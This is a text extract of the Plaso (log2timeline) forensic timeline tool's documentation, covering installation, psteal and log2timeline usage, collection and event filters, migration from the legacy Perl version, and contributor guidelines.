Plaso - Read the Docs · 1/1/1970 · 2 Developer documentation 19 ... Plaso (Plaso Langar Að Safna Öllu) is a computer forensic tool for timeline generation and analysis. The

Plaso (log2timeline)Release 20201007

unknown

Oct 26, 2020

CONTENTS

1 User documentation 31.1 User’s Guide . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.1.1 How to get started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31.1.2 Installing the packaged release . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31.1.3 Before we start . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31.1.4 The tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

1.2 Creating a timeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.2.1 Using psteal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

1.3 Collection Filters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.3.1 Using Forensic Artifacts definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.3.2 Using filter files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61.3.3 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

1.4 Event filters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71.4.1 How do event filters work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81.4.2 Example event filter expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81.4.3 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

1.5 Analysis Plugins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91.6 Tips and Tricks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

1.6.1 Import the output of a third party tool into Plaso . . . . . . . . . . . . . . . . . . . . . . . . 91.7 Switching from Log2Timeline Perl (Legacy) to Plaso . . . . . . . . . . . . . . . . . . . . . . . . . . 9

1.7.1 Old method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101.7.2 New method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

2 Developer documentation 152.1 Developer Guide . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

2.1.1 Setting up and maintaining your development environment . . . . . . . . . . . . . . . . . . 152.1.2 Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152.1.3 Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162.1.4 Roadmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162.1.5 Contributing Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

2.2 Style Guide . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172.2.1 Plaso specific style points . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

2.3 How to write a parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182.3.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182.3.2 Format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192.3.3 Parsers vs. Plugins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192.3.4 Test data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192.3.5 Parsers, formatters, events and event data . . . . . . . . . . . . . . . . . . . . . . . . . . . 19

2.4 How to write a parser plugin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212.5 How to write an analysis plugin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

i

2.5.1 Create file and class . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212.5.2 Write minimal tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212.5.3 Develop plugin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.5.4 Expand tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.5.5 Register classes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.5.6 Code review/submit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

2.6 How to write an output module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.6.1 Create file and class . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.6.2 Write minimal tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.6.3 Develop plugin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232.6.4 Expand tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232.6.5 Register classes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232.6.6 Code review/submit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

3 Troubleshooting 253.1 Quick list . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

3.1.1 Performance related issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263.2 Isolating errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263.3 Producing debug logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273.4 Import errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273.5 Crashes, hangs and tracebacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27

3.5.1 A worker segfault-ing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283.5.2 A worker gives a killed status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283.5.3 Which processes are running . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283.5.4 Analyzing crashes with single process and debug mode . . . . . . . . . . . . . . . . . . . . 283.5.5 Analyzing crashes with gdb . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

3.6 High memory usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293.7 MacOS specific issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

3.7.1 How do I remove a Plaso installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293.7.2 PyParsing errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303.7.3 ImportError: cannot import name dependencies . . . . . . . . . . . . . . . . . . . . . . . . 303.7.4 You used pip without virtualenv and have messed up your site-packages . . . . . . . . 30

3.8 Ubuntu Linux specific issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303.8.1 Origin of an installed package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

3.9 Windows specific issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303.9.1 Not a valid Win32 application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303.9.2 Unable to find an entry point in DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313.9.3 setup.py and build errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

4 Supported Formats 334.1 Storage Media Image File Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334.2 Volume System Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334.3 File System Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334.4 File formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334.5 Bencode file formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.6 ESE database file formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.7 OLE Compound File formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.8 Property list (plist) formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.9 SQLite database file formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354.10 Windows Registry formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364.11 Hashers Supported . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37

5 plaso package 395.1 Subpackages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39

ii

5.1.1 plaso.analysis package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395.1.2 plaso.analyzers package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545.1.3 plaso.cli package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 625.1.4 plaso.containers package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 975.1.5 plaso.engine package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1205.1.6 plaso.filters package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1525.1.7 plaso.formatters package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1665.1.8 plaso.lib package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1835.1.9 plaso.multi_processing package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1915.1.10 plaso.output package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1995.1.11 plaso.parsers package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2155.1.12 plaso.preprocessors package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4375.1.13 plaso.serializer package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4445.1.14 plaso.storage package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4455.1.15 plaso.unix package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4905.1.16 plaso.winnt package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 490

5.2 Submodules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4915.3 plaso.dependencies module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4915.4 Module contents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491

6 Indices and tables 493

Python Module Index 495

Index 501

iii

iv

Plaso (log2timeline), Release 20201007

Plaso (Plaso Langar Að Safna Öllu), or super timeline all the things, is a Python-based engine used by several tools forautomatic creation of timelines. Plaso default behavior is to create super timelines but it also supports creating moretargeted timelines.

These timelines support digital forensic investigators/analysts, to correlate the large amount of information found inlogs and other files found on an average computer.

The source code is available from the project page.

CONTENTS 1

http://blog.kiddaland.net/2013/02/targeted-timelines-part-i.html

https://github.com/log2timeline/plaso


2 CONTENTS

CHAPTER

ONE

USER DOCUMENTATION

1.1 User’s Guide

1.1.1 How to get started

First determine which version of Plaso is must suitable to your needs, for more information see Releases and roadmap

1.1.2 Installing the packaged release

To get Plaso up and running quickly:

• Docker for Linux, Mac OS and Windows.

Alternative options:

• Fedora

• MacOS

• Ubuntu

If you run into problems installing, check out the installation troubleshooting guide

1.1.3 Before we start

Please report all discovered bugs on the issue tracker.

To follow announcements from the Plaso team or send in generic inquiries or discuss the tool:

• subscribe to the log2timeline-discuss mailing list.

• join the Plaso channel part of the open-source-dfir Slack community, more information can be found here.

I know the good old Perl version

If you are one of those people that liked the old Perl version of log2timeline but really would like to switch use all thenifty features of the Python version. Fear not, here is a guide to help you migrate.

3

https://github.com/log2timeline/plaso/issues

https://groups.google.com/forum/#%21forum/log2timeline-discuss

https://open-source-dfir.slack.com/

https://github.com/open-source-dfir/slack


1.1.4 The tools

Though Plaso initially was created in mind to replace the Perl version of log2timeline, its focus has shifted from astand-alone tool to a set of modules that can be used in various use cases. Fear not Plaso is not a developers onlyproject it also includes several command line tools, each with its specific purpose. Currently these are:

• image_export

• log2timeline

• pinfo

• psort

• psteal

Note that each tool can be invoked with the -h or --help command line flag to display basic usage and commandline option information.

image_export

image_export is a command line tool to export file content from a storage media image or device based on variousfilter criteria, such as extension names, filter paths, file format signature identifiers, file creation date and time ranges,etc.

log2timeline

log2timeline is a command line tool to extract events from individual files, recursing a directory (e.g. mount point)or storage media image or device. log2timeline creates a Plaso storage file which can be analyzed with the pinfo andpsort tools.

The Plaso storage file contains the extracted events and various metadata about the collection process alongside infor-mation collected from the source data. It may also contain information about tags applied to events and reports fromanalysis plugins.

pinfo

pinfo is a command line tool to provide information about the contents of a Plaso storage file.

psort

psort is a command line tool to post-process Plaso storage files. It allows you to filter, sort and run automatic analysison the contents of Plaso storage files.

psteal

psteal is a command line tool that combines the functionality of log2timeline and psort.

4 Chapter 1. User documentation

Scribbles-about-events.md#what-is-an-event


1.2 Creating a timeline

1.2.1 Using psteal

The quickest way to generate a timeline with Plaso is using the “psteal” frontend. A commandline like so: psteal.py --source ~/cases/greendale/registrar.dd -o l2tcsv -w /tmp/registrar.csv will produce a csv file containing all the events from an image, with some sensible defaults.

1.3 Collection Filters

When you know beforehand which files are relevant for your analysis and which files not, you can use collection filtersto instruct Plaso to only collect events from these files. This is also referred to as targeted collection.

Plaso supports the following methods of targeted collection:

• Using Forensic Artifacts definitions

• Using filter files

Note that at the moment the different collection filters cannot be used simultaneously.

1.3.1 Using Forensic Artifacts definitions

Forensic Artifacts definitions provide a more analyst centric approach to collection filters.

For example based on the definition:

name: WindowsEventLogSystemdoc: System Windows Event Log.sources:- type: FILE

attributes:paths: ['%%environ_systemroot%%\System32\winevt\Logs\SysEvent.evt']separator: '\'

conditions: [os_major_version < 6]labels: [Logs]supported_os: [Windows]urls: ['https://forensicswiki.xyz/wiki/index.php?title=Windows_Event_Log_(EVT)']

‘WindowsEventLogSystem’ refers to the path ‘%SystemRoot%\System32\winevt\Logs\SysEvent.evt’.

To use:

log2timeline.py --artifact-filters WindowsEventLogSystem name.plaso source.raw

Note that for convenience the Forensic Artifacts definition names can also be stored in a file.

1.2. Creating a timeline 5

https://github.com/ForensicArtifacts/artifacts


1.3.2 Using filter files

Due a limitations in the original text-based filter file format the YAML-based filter format was introduced. We recom-mend using the YAML-based format.

A YAML-based filter can be used to describe the path of each file or directory Plaso should include or exclude fromparsing.

• Inclusion filters are applied before exclusion filters.

• Specifying the path of a directory will include or exclude its files and subdirectories.

Path filters are case sensitive when compared to a case sensitive file system and case insensitive when compared to acase insensitive file system.

To use:

log2timeline.py --file-filter windows.yaml name.plaso source.raw

Text-based filter file format

A text-based filter can be used to describe the path of each file or directory Plaso should include in parsing.

Note that the text-based filter file does not support exclusion filters. If you need this functionality use theYAML-based filter file instead.

The text-based filter file itself contains a path filter per line or a line starting # for comment.

# This is comment./ segment1 / segment2 / segment3 / ...{systemroot} / segment2 / segment3 / ...

The path segment separator is a forward slash ‘/’.

A path segment can be defined as

• a string representing the exact name of the directory or file;

• a regular expression representing the name of the directory or file;

• a path expansion variable, denoted by a curly bracket, such as {systemroot}.

The path must be an absolute path, meaning that is should start with ‘/’ or with path expansion variable that Plaso wasable to resolve during preprocessing. Plaso will ignore path filters it does not consider valid.

For example:

{systemroot}/System32/config/.+[.]evt/(Users|Documents And Settings)/.+/AppData/Roaming/Mozilla/Firefox/Profiles/.+/places.→˓sqlite

The first line defines a path filter that uses the “systemroot” path expansion variable that is discovered during prepro-cessing and denotes the Windows SytemRoot folder. It will then process the directories and files with a name thatendswith “.evt”.

The second line defines a path filter using both regular expressions and strings to denote the location of Firefox historyfiles.



YAML-based filter file format

A YAML-based filter can be used to describe the path of each file or directory Plaso should include or exclude fromparsing.

Include filters have precedence above exclude filters.

A path filter is defined as a set of attributes:

• “description”; optional description of the purpose of the path filter;

• “paths”: one or more paths to filter defined as a regular expression;

• “path_separator”; optional path segment separator, which is ‘/’ by default;

• “type”; required filter type either “include” or “exclude”;

For example:

description: Windows Event Log files.type: includepath_separator: '\'paths:- '%SystemRoot%\\System32\\config\\.+[.]evt'---description: Exclude Linux binaries.type: excludepaths:- '/usr/bin'

Note that if you use \ as a path segment separator it must be escaped as part of the regular expression.

1.3.3 References

• Forensic artifacts

• Targeted Timeline Collection

1.4 Event filters

Event filters are used to:

• selectively export events;

• selectively analyze events;

• apply a label to events in the tagging analysis module.

Tools that have event filter support:

• psort

1.4. Event filters 7

https://github.com/ForensicArtifacts/artifacts

http://blog.kiddaland.net/2013/02/targeted-timelines-part-i.html

Using-psort.md#filtering


1.4.1 How do event filters work

An event filter is constructed in the following way:

EXPRESSION BOOLEAN_OPERATOR EXPRESSION

Where each expression is:

ATTRIBUTE [not] OPERATOR [not] VALUE

Each expression can also be a collection of binary expressions and operators enclosed in a parenthesis.

EXPRESSION BOOLEAN_OPERATOR (EXPRESSION BINARY_OPERATOR EXPRESSION)

The following boolean operators are supported:

• and

• or

• && (and)

• || (or)

The following keywords are available:

And for negative matching the keyword “not” in front of any of these keywords is also supported. That is to say ifeach of these operators is preceded with the keyword “not” a negative matching is performed.

Note that as of 20190512 special event attributes like ‘message’, ‘source’, ‘source_short’, ‘source_long’ and‘sourcetype’ are considered part of the output and are no longer expanded in the event filter.

1.4.2 Example event filter expressions

parser is 'syslog' and body contains 'root'

This event filter applies to all events where:

• the event was produced by the parser named ‘syslog’ (case sensitive) and;

• the body attribute contains the substring ‘root’ (case insensitive).

Use “log2timeline –info” to retrieve a list of the names of all the available parsers. Or use the pinfo.py test.plaso to see a list of all parsers that were used to produce the output in the storage file.

parser contains 'firefox' AND pathspec.vss_store_number > 0

• The parser name contains the word “firefox”;

• The event was extracted from a Volume Shadow Snapshot (VSS).



1.4.3 References

• log2timeline filtering 101

1.5 Analysis Plugins

• nsrlsvr

• tagging

• viper

• virustotal

1.6 Tips and Tricks

This is a collection of few tips and tricks that can be used with Plaso

1.6.1 Import the output of a third party tool into Plaso

If want to import the output of a third party tool into your Plaso timeline export it to bodyfile (or mactime) format.The Plaso mactime parser can parse a bodyfile.

Note that the bodyfile format has numerous limitations see: ForensicsWiki: Bodyfile

The Plaso mactime parser supports timestamps with a fraction of a second since Aug 25, 2020.

1.7 Switching from Log2Timeline Perl (Legacy) to Plaso

This page contains information for those that are used to using the 0.x version of log2timeline, also known asLog2Timeline Perl or Log2Timeline legacy.

The syntax has changed somewhat from the 0.x version, the largest differences may be:

• The output of the tool is no longer controllable through the log2timeline.py command line tool (or front-end).There is only one storage mechanism and that is the Plaso storage file. To produce an output file comparablewithe the 0.x version you’ll need to run the psort.py command line tool with l2t_csv output module.

• The log2timeline.py command line tool can extract events directly from storage media images, such as raw orE01. Removing the need to manually mounting these images.

• The names of the parser have changed. There are a numerous new parsers, but note that some of the olderparsers have not been ported.

• The post-processing tool is no longer called l2t_process, it is now named psort.py.

• The command line parameters and options have changed considerably. More information below.

In the information below the name Plaso is the name of the new back-end as opposed to Log2Timeline which is the oldPerl back-end. log2timeline.py is a CLI tool (or front-end). There are other front-ends to the tool though, for exampleTimesketch.

Let’s go over the old and new method of collecting a timeline from a raw storage media image file.

1.5. Analysis Plugins 9

http://blog.kiddaland.net/2012/12/log2timeline-filtering-101.html

https://forensicswiki.xyz/wiki/index.php?title=Bodyfile

https://github.com/log2timeline/plaso/commit/c81ef3aea9817646ea2846376ce9e2a83c7d5fe5

https://github.com/google/timesketch


1.7.1 Old method

First of all we needed to mount the image. Something like this:

sudo mount -t ntfs-3g -o ro,nodev,noexec,show_sys_files,streams_interface=windows,→˓loop,offset=32256 image.dd /mnt/nfts

Then we needed to run log2timeline against the mount point. You needed to define the timezone of the suspect image,which could get overwritten if a correct value was found and you needed to define which parsers to use. The samplerun is:

cd /mnt/ntfslog2timeline -r -p -z CST6CDT -f win7 . > /cases/timeline/myhost.csv 2> /cases/→˓timeline/myhost.log

This would pick all the parsers defined in the “win7” list and run those against every file found in the mount point. Alist of all available parsers and lists could be produced by running:

log2timeline -f list

As noted earlier, the above approach would produce a large “kitchen-sink” approach timeline that is not sorted. Tosort that one (no filtering):

cd /cases/timelinel2t_process.py -b myhost.csv > myhost.sorted.csv

Now we would have a large sorted CSV file ready to analyze.

Limiting the output to a specific date could be achieved using methods like:

l2t_process.py -b myhost.csv 10-10-2012..10-11-2012

However, you could not limit the output of the timeline to a more narrow timeframe than a single day, for that youneeded grep (or some other tools of choice).

l2t_process.py -b myhost.csv 10-10-2012..10-11-2012 | grep ",1[8-9]:[0-5][0-9]:[0-→˓9][0-9],"

And filtering based on content was constrained to few options:

• Use a keyword file that contained case-insensitive regular expressions to include or exclude events.

• Use a YARA rule that matched against the description_long field.

• Use grep/sed/awk.

The problem with most of the l2t_process filtering is that it was either done on the whole line or against the descrip-tion_long field. There was no easy way to filter against a more specific attribute of the event.



1.7.2 New method

Since the new version works directly on a raw image file there is no need to mount the image first (and mounting themis actually highly discouraged), the timeline can be created in a single step:

log2timeline.py /cases/timeline/myhost.plaso image.dd

The tool will detect whether or not the input is a file, directory or a disk image/partition. If the tool requires additionalinformation, such as when VSS stores are detected or more than a single partition in the volume the tool will ask foradditional details. An example of that:

The following Volume Shadow Snapshots (VSS) were found:Identifier VSS store identifier Creation Timevss1 23b509aa-3499-11e3-be88-24fd52566ede 2013-10-16T13:18:01.→˓685825+00:00vss2 8dfc93b3-376f-11e3-be88-24fd52566ede 2013-10-18T00:28:29.→˓120593+00:00vss3 dc8ffcf4-3a6b-11e3-be8a-24fd52566ede 2013-10-21T19:24:50.→˓879381+00:00

Please specify the identifier(s) of the VSS that should be processed:Note that a range of stores can be defined as: 3..5. Multiple stores canbe defined as: 1,3,5 (a list of comma separated values). Ranges and lists canalso be combined as: 1,3..5. The first store is 1. If no stores are specifiednone will be processed. You can abort with Ctrl^C.

The options can also be supplied on the command line, --vss_stores '1,2' for defining the VSS stores toparse, or --no-vss or -vss-stores all for processing all VSS stores.

This can be achieved without calculating the offset into the disk image.

log2timeline.py --partitions 2 /cases/timeline/myhost.plaso image.dd

First of all there is quite a difference in the number of parameters, let’s go slightly over them:

• There is no -r for recursive, when the tool is run against an image or a directory recursive is automaticallyassumed, run it against a single file and it recursion is not turned on.

• There is no need to supply the tool with the -p (preprocessing) when run against an image, that is automaticallyturned on.

• The -z CST6CDT is not used here. The tool does automatically pick up the timezone and use that. Howeverin the case the timezone is not identified the option is still possible and in fact if not provided uses UTC as thetimezone.

• You may have noticed there is no -f list parameter used. The notion of selecting filters is now removedand is done automatically. The way the tool now works is that it tries to “guess” the OS and select the ap-propriate parsers based on that selection. The categories that are available can be found here or by issuinglog2timeline.py --info. If you want to overwrite the automatic selection of parsers you can definethem using the --parsers parameter.

• You have to supply the tool with the parameter to define where to save the output (can no longer just output toSTDOUT and pipe it to a file).

The equivalent call of the old tool of -f list can now be found using --info. That will print out all availableparsers and plugins in the tool. One thing to take note of is the different concepts of either plugins or parsers. In the oldtool there was just the notion of a parser, which purpose it was to parse a single file/artifact. However Plaso introducesboth plugins and parsers, and there is a distinction between the two. The parser understands and parses file formatswhereas a plugin understands data inside file formats. So in the case of the Windows Registry the parser understands

1.7. Switching from Log2Timeline Perl (Legacy) to Plaso 11


the file format of the registry and parses that, but it’s the purpose of a plugin to read the actual key content and producemeaningful data of it. The same goes with SQLite databases, the parser understands how to read SQLite databaseswhile the plugins understand the data in them, an example of a SQLite plugin is the Chrome History plugin, or theFirefox History plugin. Both are SQLite databases so the use the same parser, but the data stored in them is different,thus we need a plugin for that.

To see the list of presets that are available use the --info parameter. The old tool allowed you to indicate whichpresets you wanted using the -f parameter. In the new version this same functionality is exposed as the --parsersparameter. Example usage of this parameter is:

log2timeline.py --parsers "win7" /cases/timeline/myhost.plaso image.ddlog2timeline.py --parsers "win7,\!winreg" /cases/timeline/myhost.plaso image.ddlog2timeline.py --parsers "winreg,winevt,winevtx" /cases/timeline/myhost.plaso image.→˓dd

There is another difference, the old tool used l2t_csv as the default output, which could be configured using the -oparameter of log2timeline. This output was all saved in a single file that was unsorted, which meant that a post-processing tool called l2t_process needed to be run to sort the output and remove duplicate entries before analysisstarted (you could however immediately start to grep the output).

log2timeline.py does not allow you to control the output, there is only one available output and that is the Plaso storagefile. The Plaso storage file contains additional metadata about the how log2timeline.py was run, information gatheredduring pre-processing, warnings about data that could not be parser and other useful information that could not bestored in the older format.

The downside of the storage format is that you can no longer immediately start to grep or analyze the output of thetool, now you need to run a second tool to sort, remove duplicates and change it into a human readable format.

psort.py -w /cases/timeline/myhost.sorted.csv /cases/timeline/myhost.plaso

There is a command line tool psteal.py which runs log2timeline.py and psort.py in a single invocation.

With the new storage format and the filtering possibilities of psort, many new things are now available that were notpossible in the older version. For instance the possibility to scope the time windows of the output to few minutes:

psort.py /cases/timeline/myhost.plaso "date > '2012-10-10 18:24:00' and date < '2012-→˓10-10 22:25:19'"

Or to a specific dataset:

psort.py /cases/timeline/myhost.plaso "date > '2012-10-10 12:00:00' and date < '2012-→˓10-10 23:55:14' and message contains 'evil' and (source is 'LNK' or timestamp_desc→˓iregexp 'st\swr' or filename contains 'mystery')"

Or to just present a small time slice based on a particular event of interest:

psort.py --slice "2012-10-10T12:00:00" /cases/timeline/myhost.plaso

More information about event filters can be found here.

The main difference between the old branch and the new one is that now filtering is a lot more granular, and also verydifferent. It is possible to filter against every attribute that is stored inside the event. Some types of events will storecertain attributes, while others will not.

psort.py /cases/timeline/myhost.plaso "username contains 'joe'"

Filter like this one above will go through every event and only include those events that actually have the attributeusername set, which may not be nearly everyone (only those events that can positively attribute an event to a specific



user). And then filter out those events even further by only including the events that contain the letters “joe” (caseinsensitive).

The most common usage of the filters will most likely be constrained to the common fields, like source/source_short,date/timestamp, source_long, message, filename, timestamp_desc, parser, etc.

For now, the new version does not have some of the capabilities that the older version had, that is to say the:

• Yara rules to filter out content.

• Inclusion/exclusion regular expressions.

These are things that are on the roadmap and should hopefully be added before too long.

Another new thing that the older version did not have is metadata stored inside the storage file. Since the older versiononly used l2t_csv as the output (default output, configurable) it had no means of storing metadata about the runtimeof the tool nor the events that were collected. That has changed with the new version. Some of the metadata storedcan be used for filtering out data (or has the potential of being used for that) or at least be printed out again, since itcontains useful information about the collection.

pinfo.py -v /cases/timeline/myhost.plaso

This tool will show metadata information that is stored inside the storage file, so you can see what is exactly storedinside there. The storage may also contain additional details, such as; tags for events, analysis reports and other data.

Another aspect that was not part of the older version is tagging and any other sort of automatic analysis on the dataset. For more information see: tagging rules.

1.7. Switching from Log2Timeline Perl (Legacy) to Plaso 13



CHAPTER

TWO

DEVELOPER DOCUMENTATION

2.1 Developer Guide

• Setting up and maintaining your development environment

• Getting Started

• Design

• Roadmap

• Contributing Code

2.1.1 Setting up and maintaining your development environment

The first challenge you will encounter is setting up and maintaining your development environment.

Start by setting up a development environment:

• Development environment in a VirtualEnv

• Development environment on Fedora

• Development environment on MacOS

• Development environment on Ubuntu

• Development environment on Windows

2.1.2 Getting Started

Once you’ve set up your development environment we recommend start simple:

• How to write a parser

• How to write a parser plugin

• How to write an analysis plugin

• How to write an output module

• How to write a tagging rule

15

Developers-Guide.html#setting-up-and-maintaining-your-development-environment

Developers-Guide.html#getting-started

Developers-Guide.html#design

Developers-Guide.html#roadmap

Developers-Guide.html#contributing-code


2.1.3 Design

Overview of the general architecture of Plaso:

• Architecture

• API documentation

2.1.4 Roadmap

A high level roadmap can be found here. Individual features are tracked as a github issue and labeled as “enhance-ment”. A list of features we’d already like to add can be found here.

2.1.5 Contributing Code

Want to add a parser to Plaso and you are ready to go? Start by checking here if someone is already working on it. Ifyou don’t see anything there you can just go ahead and create an issue on the github site and mark it as “enhancement”.Assign the issue to yourself so that we can keep track on who is working on what.

If you cannot program and still have a great idea for a feature please go ahead and create an issue and leave itunassigned, note that the priority will be who ever wants to work on it.

Before you start writing code, please review the following:

• Style guide. All code submitted to the project needs to follow this style guide.

• Code review. All code that is submitted into the project is reviewed by at least one other person.

• Adding a new dependency. If your code requires adding a new dependency please check out these instructions.

Before you submit your first code review

1. Join the development mailing list: [email protected] and Slack channel, we recommendusing the same account as step 1

2. Install the required development tools like pylint and python-mock

3. Make sure to run all the tests in the Plaso codebase, and that they successfully complete in your developmentenvironment

4. Make sure your development environment is set up correctly so that you can develop and test correctly.

5. Make sure your email address and name are correctly set in git. You can use the following commands:

git config --global user.name "Full Name"git config --global user.email [email protected] config --global push.default matching

Use git config -l to see your current configuration.

16 Chapter 2. Developer documentation

https://plaso.readthedocs.io/en/latest/sources/api/plaso.html

https://github.com/log2timeline/plaso/issues?q=is%3Aopen+is%3Aissue+label%3Aenhancement

https://github.com/log2timeline/plaso/issues?q=is%3Aopen+is%3Aissue+label%3Aenhancement


https://github.com/log2timeline/l2tdocs/blob/master/process/Code%20review%20process.md

https://github.com/log2timeline/l2tdocs/blob/master/process/Dependencies.md

https://groups.google.com/forum/#%21forum/log2timeline-dev

